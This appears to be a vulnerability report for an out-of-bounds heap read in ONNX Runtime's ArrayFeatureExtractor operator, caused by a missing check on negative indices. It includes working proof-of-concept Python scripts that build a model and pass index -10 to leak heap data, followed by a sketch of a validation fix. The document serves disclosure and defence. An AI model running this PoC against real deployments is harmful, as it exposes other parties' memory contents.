Description
The vulnerability being exploited is a disclosure of heap memory caused by an out-of-bounds read in ONNX Runtime's ArrayFeatureExtractor operator. The root cause is insufficient bounds checking on the index input, which allows negative index values to read unintended memory regions.
PoC: the attached files show the reproduction code and its output.
Per Copilot:
Type: Out-of-bounds read (OOB read) in ONNX Runtime’s ArrayFeatureExtractor operator
Affected Version: ≤ 1.23.2 (latest at time of report)
Root Cause:
In the file `onnxruntime/core/providers/cpu/ml/array_feature_extractor.cc`, the code checks that `y_data[i] <= stride` (where `stride` is the total length of `x`), but never checks that `y_data[i] >= 0`.
This means a negative index can be used, causing an out-of-bounds read and leaking heap memory values.
Example: supplying a negative value in `y_data` (e.g., `y_data = [-10]`) bypasses the bounds check, reads memory outside the tensor, and exposes heap data.
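The flaw described above can be illustrated with a small Python sketch. This is an illustrative model of the reported check, not the actual C++ code; `flawed_check` and `fixed_check` are made-up names:

```python
import numpy as np

def flawed_check(y_data, stride):
    # Mirrors the reported logic: only the upper bound is validated.
    return all(idx <= stride for idx in y_data)

def fixed_check(y_data, stride):
    # Adds the missing lower-bound test, rejecting negative indices.
    return all(0 <= idx <= stride for idx in y_data)

stride = 10                               # total length of x in the PoC
y_data = np.array([-10], dtype=np.int64)  # the PoC index

print(flawed_check(y_data, stride))  # True  -> -10 is accepted, OOB read follows
print(fixed_check(y_data, stride))   # False -> -10 is rejected
```

A negative index passes the upper-bound-only test, which is exactly why the PoC below leaks heap values instead of raising an error.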
Finder's Notes
Detailed information is in the attachment, which includes complete steps to reproduce the problem.
Save the model
```python
import onnx
from onnx import helper, TensorProto

# Tensor shapes and element types for the test graph
x_shape = [10, 1]
x_dtype = TensorProto.INT64
y_shape = [1]
y_dtype = TensorProto.INT64
z_shape = [10, 1]
z_dtype = TensorProto.INT64

node = helper.make_node(
    op_type="ArrayFeatureExtractor",
    inputs=["x", "y"],
    outputs=["z"],
    domain="ai.onnx.ml",
)

input_x = helper.make_tensor_value_info("x", x_dtype, x_shape)
input_y = helper.make_tensor_value_info("y", y_dtype, y_shape)
output_z = helper.make_tensor_value_info("z", z_dtype, z_shape)

graph = helper.make_graph(
    nodes=[node],
    name="ArrayFeatureExtractor_Test",
    inputs=[input_x, input_y],
    outputs=[output_z],
)

opset_imports = [
    helper.make_opsetid("", 15),
    helper.make_opsetid("ai.onnx.ml", 3),
]

model = helper.make_model(
    graph,
    opset_imports=opset_imports,
    producer_name="onnx-example",
)
onnx.save(model, "array_feature_extractor_manual.onnx")
```
Load and run the model
```python
import numpy as np
import onnxruntime as ort

session = ort.InferenceSession(
    "array_feature_extractor_manual.onnx",
    providers=["CPUExecutionProvider"],
)

x_data = np.arange(10, dtype=np.int64).reshape(10, 1)
y_data = np.array([-10], dtype=np.int64)  # negative index triggers the OOB read
print(x_data)
print("Index:", y_data)

results = session.run(["z"], {"x": x_data, "y": y_data})
z_output = results[0]
print(z_output)  # leaked heap values instead of an error
```
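Until a patched release is available, callers can reject bad indices before inference. The sketch below uses a hypothetical `safe_indices` helper (not part of ONNX Runtime's API) to apply the bounds check the operator omits, with `stride` meaning the total length of `x` as in the report:

```python
import numpy as np

def safe_indices(y_data, stride):
    """Reject indices outside [0, stride) before passing them to the model.
    Illustrative mitigation only; not an ONNX Runtime API."""
    y = np.asarray(y_data)
    if ((y < 0) | (y >= stride)).any():
        raise ValueError(f"index out of range for stride {stride}: {y.tolist()}")
    return y

x_data = np.arange(10, dtype=np.int64).reshape(10, 1)
safe_indices(np.array([3], dtype=np.int64), x_data.shape[0])      # passes
try:
    safe_indices(np.array([-10], dtype=np.int64), x_data.shape[0])
except ValueError as exc:
    print("rejected:", exc)
```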